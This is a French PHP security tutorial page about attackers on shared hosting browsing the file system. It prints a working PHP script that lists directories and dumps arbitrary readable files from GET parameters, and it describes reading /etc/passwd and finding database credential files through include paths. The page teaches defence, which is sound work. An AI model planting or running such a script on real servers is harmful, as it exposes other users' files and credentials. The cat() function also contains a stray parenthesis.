Sécurité PHP - Navigation dans le système de fichiers

黄舟
Libérer: 2023-03-05 20:44:01
original
885 Les gens l'ont consulté



Navigation dans le système de fichiers

En plus de pouvoir lire des fichiers arbitraires sur le serveur partagé, l'attaquant peut également créer un script capable de parcourir le système de fichiers. Étant donné que la plupart de vos fichiers sensibles ne seront pas stockés dans le répertoire personnel de votre site Web, ce type de script est généralement utilisé pour trouver l'emplacement de vos fichiers sources. Veuillez consulter l'exemple suivant :

 <pre class="brush:php;toolbar:false">
 
  <?php
 
  if (isset($_GET[&#39;dir&#39;]))
  {
    ls($_GET[&#39;dir&#39;]);
  }
  elseif (isset($_GET[&#39;file&#39;]))
  {
    cat($_GET[&#39;file&#39;]);
  }
  else
  {
    ls(&#39;/&#39;);
  }
 
  function cat($file)
  {
    echo htmlentities(file_get_contents($file),
ENT_QUOTES, &#39;UTF-8&#39;));
  }
 
  function ls($dir)
  {
    $handle = dir($dir);
 
    while ($filename = $handle->read())
    {
      $size = filesize("$dir$filename");
 
      if (is_dir("$dir$filename"))
      {
        $type = &#39;dir&#39;;
        $filename .= &#39;/&#39;;
      }
      else
      {
        $type = &#39;file&#39;;
      }
 
      if (is_readable("$dir$filename"))
      {
        $line = str_pad($size, 15);
        $line .= "<a
href=\"{$_SERVER[&#39;PHP_SELF&#39;]}";
        $line .=
"?$type=$dir$filename\">$filename</a>";
      }
      else
      {
        $line = str_pad($size, 15);
        $line .= $filename;
      }
 
      echo "$line\n";
    }
 
    $handle->close();
  }
 
  ?>
 
  
Copier après la connexion


Un attaquant peut d'abord consulter le fichier /etc/passwd ou le répertoire /home pour obtenir une liste de noms d'utilisateur sur le serveur ; l'emplacement des fichiers sources stockés en dehors du répertoire personnel du site Web peut être découvert grâce à des structures de langage telles que include ou require. Par exemple, considérons le fichier de script suivant /home/victim/public_html/admin.php :

  <?php
 
  include &#39;../inc/db.inc&#39;;
 
  /* ... */
 
  ?>
Copier après la connexion


Si un attaquant parvient à afficher le code source du fichier, il peut découvrir l'emplacement de db.inc et utiliser la fonction readfile() pour exposer son contenu et accéder à la base de données. Ainsi, enregistrer db.inc en dehors du répertoire personnel du site Web ne le protège pas dans cet environnement.

Cette attaque illustre pourquoi tous les fichiers sources d'un serveur partagé doivent être considérés comme publics et la base de données choisie pour stocker toutes les données sensibles.

Ce qui précède est le contenu de la navigation dans le système de fichiers de sécurité PHP. Pour plus de contenu connexe, veuillez prêter attention au site Web PHP chinois (www. php.cn) !


Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal